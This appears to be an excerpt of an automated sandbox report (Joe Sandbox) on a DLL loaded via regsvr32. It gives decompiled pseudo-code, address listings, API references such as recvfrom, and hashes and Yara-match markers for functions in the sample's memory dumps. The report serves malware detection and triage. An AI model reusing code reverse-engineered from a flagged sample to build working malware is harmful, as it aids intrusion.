												__edx = __cx;
												__ecx =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax - 0x2a;
												__ecx = __cx;
												 *((intOrPtr*)(__ebp + 8)) = __edx;
												 *(__ebp + 0xc) = __ecx;
												if(__eax != 0x2a) {
													_push(__ecx);
													_push(__edx);
													L88:
													__ecx = __edi;
													__eax =  *__ebx();
													goto L106;
												}
												_push(E1000FB5C(__ebx, __ecx, __ebp, __esi));
												_push( *(__ebp + 0xc));
												_push( *((intOrPtr*)(__ebp + 8)));
												goto L96;
											case 0x1e:
												_push(__esi);
												L90:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0x1f:
												_push(__esi);
												_push( *(__ebp + 0xc));
												__ecx = __edi;
												__eax =  *__ebx();
												goto L2;
											case 0x20:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__ecx);
												L42:
												_push(__eax);
												goto L104;
											case 0x21:
												__eax =  *(__ebp + 0xc);
												_push(__esi);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												L92:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L93:
												_push(__eax);
												goto L96;
											case 0x22:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__si);
												L95:
												_push(__eax);
												_push( *(__ebp + 0xc));
												L96:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0x23:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												_push( *(__ebp + 0xc) & 0x0000ffff);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
												L6:
												__eflags = _t185;
												if(_t185 != 0) {
													goto L106;
												}
												goto L39;
											case 0x24:
												goto L106;
											case 0x25:
												__ecx = __edi;
												__eax =  *__ebx();
												__eflags = __eax;
												 *(__ebp - 0x10) = __eax;
												if(__eax == 0) {
													goto L106;
												}
												L39:
												 *(_t225 - 4) =  *(_t225 - 4) | 0xffffffff;
												E1000E808(_t225 - 0x14);
												_t163 = 0;
												__eflags = 0;
												goto L40;
										}
									}
									_t170 =  *(_t225 - 0x18);
									_t58 =  &(_t170[1]);
									 *_t58 = _t170[1] & 0x00000000;
									__eflags =  *_t58;
									E1000E808(_t225 - 0x14);
									goto L39;
								}
								_t173 = _t194;
								__eflags =  *(_t225 + 0x10) - _t173[2];
								if( *(_t225 + 0x10) != _t173[2]) {
									goto L25;
								}
								_t196 = _t173[1];
								 *(_t225 + 0x10) = _t196;
								E1000E808(_t225 - 0x14);
								__eflags = _t196;
								if(_t196 == 0) {
									goto L39;
								}
								__eflags =  *(_t225 + 8) - 0xc000;
								if( *(_t225 + 8) < 0xc000) {
									goto L29;
								}
								goto L102;
							}
							__eflags =  *(_t147 + 0x74);
							if( *(_t147 + 0x74) <= 0) {
								goto L20;
							}
							__eflags = _t189 - 0x200;
							if(_t189 < 0x200) {
								L16:
								__eflags = _t189 - 0x100;
								if(_t189 < 0x100) {
									L18:
									__eflags = _t189 - 0x281 - 0x10;
									if(_t189 - 0x281 > 0x10) {
										goto L20;
									}
									L19:
									_t177 =  *((intOrPtr*)( *( *(_t222 + 0x4c)) + 0x94))(_t189,  *((intOrPtr*)(_t225 + 0xc)), _t224, _t225 - 0x10);
									__eflags = _t177;
									if(_t177 != 0) {
										goto L106;
									}
									goto L20;
								}
								__eflags = _t189 - 0x10f;
								if(_t189 <= 0x10f) {
									goto L19;
								}
								goto L18;
							}
							__eflags = _t189 - 0x209;
							if(_t189 <= 0x209) {
								goto L19;
							}
							goto L16;
						} else {
							_t181 = E100111CF(_t189, _t222, _t222, _t224, _t224 >> 0x10);
							__eflags = _t181;
							if(_t181 != 0) {
								L2:
								 *((intOrPtr*)(_t225 - 0x10)) = 1;
								L106:
								_t160 =  *((intOrPtr*)(_t225 + 0x14));
								if(_t160 != 0) {
									 *_t160 =  *((intOrPtr*)(_t225 - 0x10));
								}
								 *(_t225 - 4) =  *(_t225 - 4) | 0xffffffff;
								E1000E808(_t225 - 0x14);
								_t163 = 1;
								L40:
								return E10017C60(_t163);
							}
							goto L12;
						}
					}
					_t217 =  *(_t225 + 0x10);
					__eflags =  *_t217;
					if( *_t217 == 0) {
						goto L39;
					}
					_push(_t225 - 0x10);
					_push(_t217);
					_push( *((intOrPtr*)(_t225 + 0xc)));
					_t185 =  *((intOrPtr*)( *__ecx + 0xec))();
					goto L6;
				}
				_push( *(_t225 + 0x10));
				_push( *((intOrPtr*)(_t225 + 0xc)));
				if( *((intOrPtr*)( *__ecx + 0xe8))() == 0) {
					goto L39;
				}
				goto L2;
			}

0x1001178a
0x1001178a
0x10011791
0x10011796
0x1001179a
0x1001179d
0x100117a4
0x100117ad
0x100117b0
0x100117d4
0x100117d7
0x10011803
0x10011806
0x10011809
0x10011816
0x10011816
0x1001181b
0x1001181e
0x10011834
0x10011834
0x10011837
0x10011839
0x10011888
0x1001188c
0x10011899
0x100118a2
0x100118ad
0x100118b3
0x100118b5
0x100118b8
0x100118e8
0x100118e8
0x100118eb
0x100118f1
0x100118f3
0x10011982
0x10011982
0x10011985
0x00000000
0x00000000
0x100118fb
0x10011902
0x10011904
0x10011906
0x1001194a
0x1001194f
0x1001196d
0x10011972
0x10011974
0x10011976
0x00000000
0x00000000
0x10011958
0x1001195a
0x10011c6b
0x10011c6e
0x10011c73
0x10011c73
0x10011c76
0x10011c76
0x10011c77
0x10011c7a
0x10011c7c
0x10011c7e
0x10011c7e
0x00000000
0x10011c7e
0x10011960
0x10011962
0x10011964
0x10011969
0x10011969
0x1001196c
0x1001196c
0x10011978
0x1001197b
0x1001197d
0x1001197f
0x00000000
0x1001197f
0x10011908
0x1001190b
0x1001190e
0x10011913
0x10011915
0x10011918
0x00000000
0x00000000
0x1001191d
0x10011923
0x10011928
0x10011931
0x10011934
0x10011937
0x00000000
0x00000000
0x1001193d
0x00000000
0x100119c0
0x100119c8
0x00000000
0x00000000
0x100119d2
0x00000000
0x00000000
0x100119ec
0x100119ee
0x100119ee
0x100119f1
0x100119f2
0x100119f5
0x100119f9
0x00000000
0x00000000
0x10011a08
0x10011a0c
0x00000000
0x00000000
0x10011a13
0x100119c9
0x100119c9
0x100119cb
0x00000000
0x00000000
0x10011a16
0x10011a1e
0x10011a21
0x10011a24
0x10011a28
0x10011a2b
0x10011a30
0x10011a32
0x10011a36
0x10011a3a
0x10011a3d
0x10011a42
0x10011a44
0x10011a46
0x10011a49
0x10011a4b
0x10011a50
0x10011a53
0x10011a58
0x10011a5a
0x10011a5c
0x10011a5c
0x10011a5a
0x10011a5f
0x10011a5f
0x10011a62
0x10011a63
0x10011a64
0x10011a67
0x10011a68
0x10011a6a
0x10011a6c
0x10011a70
0x10011a74
0x10011a77
0x10011a7a
0x10011a7e
0x00000000
0x00000000
0x10011a85
0x10011a8d
0x10011a90
0x10011a93
0x10011a96
0x10011a99
0x10011a9a
0x10011a9c
0x10011aa0
0x10011aa2
0x10011aa2
0x10011aa2
0x10011aa6
0x10011aa9
0x10011aa9
0x10011aac
0x10011ab0
0x00000000
0x00000000
0x10011aba
0x10011abd
0x10011abd
0x10011ac0
0x10011ac2
0x00000000
0x00000000
0x10011ad4
0x10011ad7
0x10011ad8
0x00000000
0x00000000
0x00000000
0x00000000
0x10011ae1
0x10011ae7
0x10011ae8
0x10011aeb
0x10011ac7
0x10011ac7
0x10011ac8
0x100119fe
0x100119fe
0x100119ff
0x10011a01
0x00000000
0x00000000
0x10011bee
0x00000000
0x00000000
0x10011af9
0x00000000
0x00000000
0x10011af0
0x10011af2
0x00000000
0x00000000
0x10011b04
0x10011b07
0x10011b08
0x00000000
0x00000000
0x10011b13
0x10011b16
0x10011b19
0x10011b1a
0x00000000
0x00000000
0x10011b27
0x10011b28
0x00000000
0x00000000
0x100119e6
0x10011bef
0x10011bef
0x00000000
0x00000000
0x100119d7
0x100119d9
0x00000000
0x00000000
0x10011b38
0x10011b3f
0x10011b40
0x10011b42
0x10011b45
0x00000000
0x00000000
0x10011b4d
0x10011b50
0x00000000
0x00000000
0x10011b57
0x10011b5a
0x00000000
0x00000000
0x10011b63
0x10011b66
0x10011b69
0x10011b6a
0x10011b6d
0x10011b6e
0x10011b71
0x00000000
0x00000000
0x10011b7b
0x00000000
0x00000000
0x10011b80
0x10011b81
0x10011b81
0x10011b86
0x10011b86
0x00000000
0x00000000
0x10011b8e
0x10011b8f
0x00000000
0x00000000
0x10011b94
0x10011b97
0x10011b9a
0x10011b9d
0x10011b9e
0x10011b9e
0x10011ba2
0x00000000
0x00000000
0x10011ba9
0x10011bad
0x10011bb2
0x10011bb2
0x00000000
0x00000000
0x10011bb8
0x10011bbb
0x10011bbd
0x00000000
0x00000000
0x10011bc4
0x10011bc7
0x10011bca
0x10011bcd
0x10011bd0
0x10011bd3
0x10011bd6
0x10011bd9
0x10011bea
0x10011beb
0x10011bf2
0x10011bf2
0x10011bf4
0x00000000
0x10011bf4
0x10011be1
0x10011be2
0x10011be5
0x00000000
0x00000000
0x10011bfb
0x10011bfc
0x10011bfc
0x10011bfe
0x00000000
0x00000000
0x10011c25
0x10011c26
0x10011c29
0x10011c2b
0x00000000
0x00000000
0x100119b0
0x100119b3
0x100119b6
0x100119b9
0x100119ba
0x100119ba
0x00000000
0x00000000
0x10011c02
0x10011c05
0x10011c06
0x10011c06
0x10011c09
0x10011c09
0x10011c0a
0x10011c0e
0x10011c0e
0x00000000
0x00000000
0x10011c11
0x10011c14
0x10011c17
0x10011c1a
0x10011c1b
0x10011c1b
0x10011c1c
0x10011c1f
0x10011c1f
0x10011c21
0x00000000
0x00000000
0x10011c32
0x10011c35
0x10011c38
0x10011c3b
0x10011c3c
0x10011c40
0x10011c43
0x10011c44
0x10011c48
0x10011c49
0x10011c4b
0x10011c4d
0x100117f6
0x100117f6
0x100117f8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10011c55
0x10011c57
0x10011c59
0x10011c5b
0x10011c5e
0x00000000
0x00000000
0x1001199a
0x1001199a
0x100119a1
0x100119a6
0x100119a6
0x00000000
0x00000000
0x1001193d
0x1001198b
0x1001198e
0x1001198e
0x1001198e
0x10011995
0x00000000
0x10011995
0x100118bd
0x100118bf
0x100118c2
0x00000000
0x00000000
0x100118c4
0x100118ca
0x100118cd
0x100118d2
0x100118d4
0x00000000
0x00000000
0x100118da
0x100118e1
0x00000000
0x00000000
0x00000000
0x100118e3
0x1001183b
0x1001183f
0x00000000
0x00000000
0x10011841
0x10011847
0x10011851
0x10011851
0x10011857
0x10011861
0x10011867
0x1001186a
0x00000000
0x00000000
0x1001186c
0x1001187a
0x10011880
0x10011882
0x00000000
0x00000000
0x00000000
0x10011882
0x10011859
0x1001185f
0x00000000
0x00000000
0x00000000
0x1001185f
0x10011849
0x1001184f
0x00000000
0x00000000
0x00000000
0x10011820
0x1001182b
0x10011830
0x10011832
0x100117c8
0x100117c8
0x10011c81
0x10011c81
0x10011c86
0x10011c8b
0x10011c8b
0x10011c8d
0x10011c94
0x10011c9b
0x100119a8
0x100119ad
0x100119ad
0x00000000
0x10011832
0x1001181e
0x100117d9
0x100117dc
0x100117de
0x00000000
0x00000000
0x100117e9
0x100117ea
0x100117eb
0x100117f0
0x00000000
0x100117f0
0x100117b2
0x100117b7
0x100117c2
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 10011791

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: c488e6358afd4d9d754c5c9fda2634e7bab5cc465686e7f95f68ab9b090a2a17
Instruction ID: cc0fde642219aadce896e713a6cb9948d2e0911a96acc08396d26a1a5d665eaf
Opcode Fuzzy Hash: c488e6358afd4d9d754c5c9fda2634e7bab5cc465686e7f95f68ab9b090a2a17
Instruction Fuzzy Hash: 6EF15F74604219EFDB18DF64C890AFE7BE9EF04350F108519F919AF292DB34E981EB61

Uniqueness

Uniqueness Score: -1.00%

Function 100012D0, Relevance: 1.5, APIs: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E100012D0(intOrPtr __ecx, void* _a4) {
				char _v8;
				signed int _v12;
				char _v20;
				void _v1044;
				intOrPtr _v1048;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t26;
				signed int _t41;

				_t19 =  *0x10057a08; // 0xe86d94f5
				_v12 = _t19 ^ _t41;
				_v1048 = __ecx;
				_v20 = 0;
				_v8 = 0x10;
				__imp__#17( &_v1044, 0x400, 0, _v1048 + 0x14,  &_v8);
				_v20 = _v1048;
				 *((char*)(_t41 + _v20 - 0x410)) = 0;
				memcpy(_a4,  &_v1044, 0x101 << 2);
				return E100167D5(_a4, _t26, _v12 ^ _t41, _v20,  &_v1044 + 0x202,  &_v1044,  *((intOrPtr*)(_v1048 + 0x24)));
			}

0x100012d9
0x100012e0
0x100012e5
0x100012eb
0x100012f2
0x1000131f
0x10001325
0x1000132b
0x10001341
0x10001355

APIs

recvfrom.WS2_32(?,?,00000400,00000000,?,00000010), ref: 1000131F

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: recvfrom
String ID:
API String ID: 846543921-0
Opcode ID: e3286800183b2fb084681865d01d3168ae5294563589533788e7953d9f8637e2
Instruction ID: bec5cb5057db5f544406cf49396100538fbf28fc5aa5dd8def6f1e45c3881569
Opcode Fuzzy Hash: e3286800183b2fb084681865d01d3168ae5294563589533788e7953d9f8637e2
Instruction Fuzzy Hash: 830112F5A0011C9FDB14CF58CD54BDEB7B8FF88314F4045A9E609A7241D7B4AA84CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 04B9F840, Relevance: 1.5, Strings: 1, Instructions: 210COMMON

Download Yara Rule

Strings

!+s, xrefs: 04B9FA53

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: !+s
API String ID: 0-2041718826
Opcode ID: ecbfb722ef4a51468ccc6504c580edf44e6ea5507055d07fe96aabdae32b1462
Instruction ID: 3648ee431cabf6b9a5b64cf3e4331f34dcb17b44789648ba82240c65c14cd8c2
Opcode Fuzzy Hash: ecbfb722ef4a51468ccc6504c580edf44e6ea5507055d07fe96aabdae32b1462
Instruction Fuzzy Hash: 1F910E721083449FD758CF66C88991BFBE1FBC4B58F40892DF69686260D3B6D949CF82

Uniqueness

Uniqueness Score: -1.00%

Function 04BA0A64, Relevance: 1.4, Strings: 1, Instructions: 197COMMON

Download Yara Rule

Strings

i*_, xrefs: 04BA0B14

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: i*_
API String ID: 0-4175851924
Opcode ID: 033916526ebd42fe384ae7de4cef2794808c9c5efeeb7d3c76fe8acba1a56522
Instruction ID: 29b0096feccf44b9a69ca6cddd0256f0dfcfcde7b20e29b89d0f0cf95f3acb51
Opcode Fuzzy Hash: 033916526ebd42fe384ae7de4cef2794808c9c5efeeb7d3c76fe8acba1a56522
Instruction Fuzzy Hash: 5B8140B21083409FD754CE61D98991BFBF1EBC4B58F40891CF9929A260D3B6DA49CF43

Uniqueness

Uniqueness Score: -1.00%

Function 04B9C5D5, Relevance: 1.4, Strings: 1, Instructions: 194COMMON

Download Yara Rule

Strings

<;M, xrefs: 04B9C6DD

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: <;M
API String ID: 0-164005337
Opcode ID: a6c172a9da4fc4132d18ee35a48644effdef2301e8927dde18b60e412ee08184
Instruction ID: 755995c71798f859be40f410d17ebcb5efbb169fa9d08c7a310cb92f86bacc0e
Opcode Fuzzy Hash: a6c172a9da4fc4132d18ee35a48644effdef2301e8927dde18b60e412ee08184
Instruction Fuzzy Hash: 54919A71D00218EBDF58CFA9D98A9EEBBB1FF44314F20805AE516BB250D7B41A45CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 04B81F38, Relevance: 1.4, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

Ft, xrefs: 04B81FAB

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Ft
API String ID: 0-1468847975
Opcode ID: 31d946d577bb10f9a235b520a9386b61305483215372ed27f7849cc65d53a51a
Instruction ID: ca88c2dcb11233de262b842bca75474c86e68dff0c5cb5801a617475d94ac9fd
Opcode Fuzzy Hash: 31d946d577bb10f9a235b520a9386b61305483215372ed27f7849cc65d53a51a
Instruction Fuzzy Hash: 1E519D7290C3018BC358EF64D88541BBBE0FB84728F144A9DF999A6160D7B1EA59CF87

Uniqueness

Uniqueness Score: -1.00%

Function 04B9E1F8, Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

>Z, xrefs: 04B9E21C

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: >Z
API String ID: 0-2342695272
Opcode ID: 8d1f742a32db50f7dddfc35a7796f107023b2d8a4909f84100ef567bcb9ec99c
Instruction ID: 1565c1787968ec21fe4dd94c7dda08b68b037be2bc77c01ecface67813adfd99
Opcode Fuzzy Hash: 8d1f742a32db50f7dddfc35a7796f107023b2d8a4909f84100ef567bcb9ec99c
Instruction Fuzzy Hash: 9D41B1726183119BD304DF29C48585BFBE1FFC8728F484A6EF889A7250D774EA05CB96

Uniqueness

Uniqueness Score: -1.00%

Function 04B855FF, Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

\Lh, xrefs: 04B85706

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: \Lh
API String ID: 0-2235754405
Opcode ID: 63cd4f9c5a574e3e45a1960c735d5968b00aabc6b35dc1560b5b813faa8dd26e
Instruction ID: a775723b0ef3bfd3ee112c09b2a14f00d9a920545f742d2673758bd32e32b974
Opcode Fuzzy Hash: 63cd4f9c5a574e3e45a1960c735d5968b00aabc6b35dc1560b5b813faa8dd26e
Instruction Fuzzy Hash: 2E41AB71208342DFD768DE20C88482FBBE5FFD8318F104A5DF5A592260E775DA09CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 04B8E640, Relevance: 1.4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

Strings

B:}I, xrefs: 04B8E6C4

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: B:}I
API String ID: 0-2889142627
Opcode ID: 6ed0f2fc26554ae44f1383b8ba90fd9ece13569b3829980cc3403a361e899453
Instruction ID: ddd5ecb6094819682ec319645cffaa28d46b615081cc22a3ad35cbb40fa499ce
Opcode Fuzzy Hash: 6ed0f2fc26554ae44f1383b8ba90fd9ece13569b3829980cc3403a361e899453
Instruction Fuzzy Hash: 2241A975608342DBD758DE20D98582BBBE4FBD4718F00091DF582922A0E775EA09CF93

Uniqueness

Uniqueness Score: -1.00%

Function 04B90ABA, Relevance: 1.3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

WLX, xrefs: 04B90BA2

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: WLX
API String ID: 0-2077286540
Opcode ID: b94b1f32627560e7e3bebf5b4d80886b5e9b19d90dbb90a2e0b071273a2a2c24
Instruction ID: 55ccb112939ad3c46301567a7c860287e2860ed07ecdf26f3c9d626ff0f30e85
Opcode Fuzzy Hash: b94b1f32627560e7e3bebf5b4d80886b5e9b19d90dbb90a2e0b071273a2a2c24
Instruction Fuzzy Hash: A441E2B1D0120DEBDF05DFA5D94A8EEBBB5FB48318F208199E912B7210D3B54A55CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04B9FBDE, Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

$Jx, xrefs: 04B9FCDC

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $Jx
API String ID: 0-2488101295
Opcode ID: 3c72f89ac838f3d50265b5f28eac6d93118fd27f641bc254c834ca5eaf513903
Instruction ID: 9e4e073ca7508a5bf494dae6fce843b58bde9e0fc03cafc43863f9a3aed492d9
Opcode Fuzzy Hash: 3c72f89ac838f3d50265b5f28eac6d93118fd27f641bc254c834ca5eaf513903
Instruction Fuzzy Hash: 9A4136B1D0021AEBDF08CFA5C98A5EEBBB1FB44318F24819DD511B7250D7B81A45CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04B87078, Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

'iY, xrefs: 04B87118

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 'iY
API String ID: 0-1691070665
Opcode ID: 6788c65911eecd76a1228675ca9b2fbe269b5cbae0b502254479bb4ad135f5f6
Instruction ID: 2e1f77f2c1276e8add2ee6390b9606ab94b9d12d509bcd009f24b329b44f79d9
Opcode Fuzzy Hash: 6788c65911eecd76a1228675ca9b2fbe269b5cbae0b502254479bb4ad135f5f6
Instruction Fuzzy Hash: 0D412472E00219EBEF08DFA5D94A9EEFBB2FB44304F208059D515BB290D7B56A15CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04B96187, Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

^, xrefs: 04B961E6

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ^
API String ID: 0-1590793086
Opcode ID: 15f427db74853c52db19e36ecd5d1196a4b9b3c1a225ff2705a6343ab6a06753
Instruction ID: ea04412b72730f9faeacc34c455121f9dbd15f6fef38773df60787aaeaeff178
Opcode Fuzzy Hash: 15f427db74853c52db19e36ecd5d1196a4b9b3c1a225ff2705a6343ab6a06753
Instruction Fuzzy Hash: 633147716093428FCB18CF25A58540FBBE5FBD4748F104A2DF595A6220D3B5EA1A8BD3

Uniqueness

Uniqueness Score: -1.00%

Function 04B9CAD5, Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

P/, xrefs: 04B9CB7E

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: P/
API String ID: 0-4116444305
Opcode ID: 6f020d937ebaa896c9d230a2bf1ecbcee9e07464a67b9e6fe3dda2eabbf40348
Instruction ID: 9f4b264c2601c643a10ea6cbe2fdbb6756434e58fce8352ba414963c270edf98
Opcode Fuzzy Hash: 6f020d937ebaa896c9d230a2bf1ecbcee9e07464a67b9e6fe3dda2eabbf40348
Instruction Fuzzy Hash: B431327190130AEFDF08CFA1CA0689EBBB1FF44304F108549E926A6220C3B5AB61DF81

Uniqueness

Uniqueness Score: -1.00%

Function 04BA2B09, Relevance: 1.3, Strings: 1, Instructions: 57COMMON

Download Yara Rule

Strings

Wm, xrefs: 04BA2BAF

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Wm
API String ID: 0-1953712011
Opcode ID: 5f458415f00c48274a736efb525796b6a242fc0a9122d131060991abe7e8c2f8
Instruction ID: 03e2780a1a41e6ef2d79a67747519cc48022dfe8e6e784748e0d7aece1aef798
Opcode Fuzzy Hash: 5f458415f00c48274a736efb525796b6a242fc0a9122d131060991abe7e8c2f8
Instruction Fuzzy Hash: 0321FE72D01319EBDF59AFE4D84A4EEBBB1FB00318F108699E42966250D3B50B88DF80

Uniqueness

Uniqueness Score: -1.00%

Function 1001929D, Relevance: .4, Instructions: 384COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
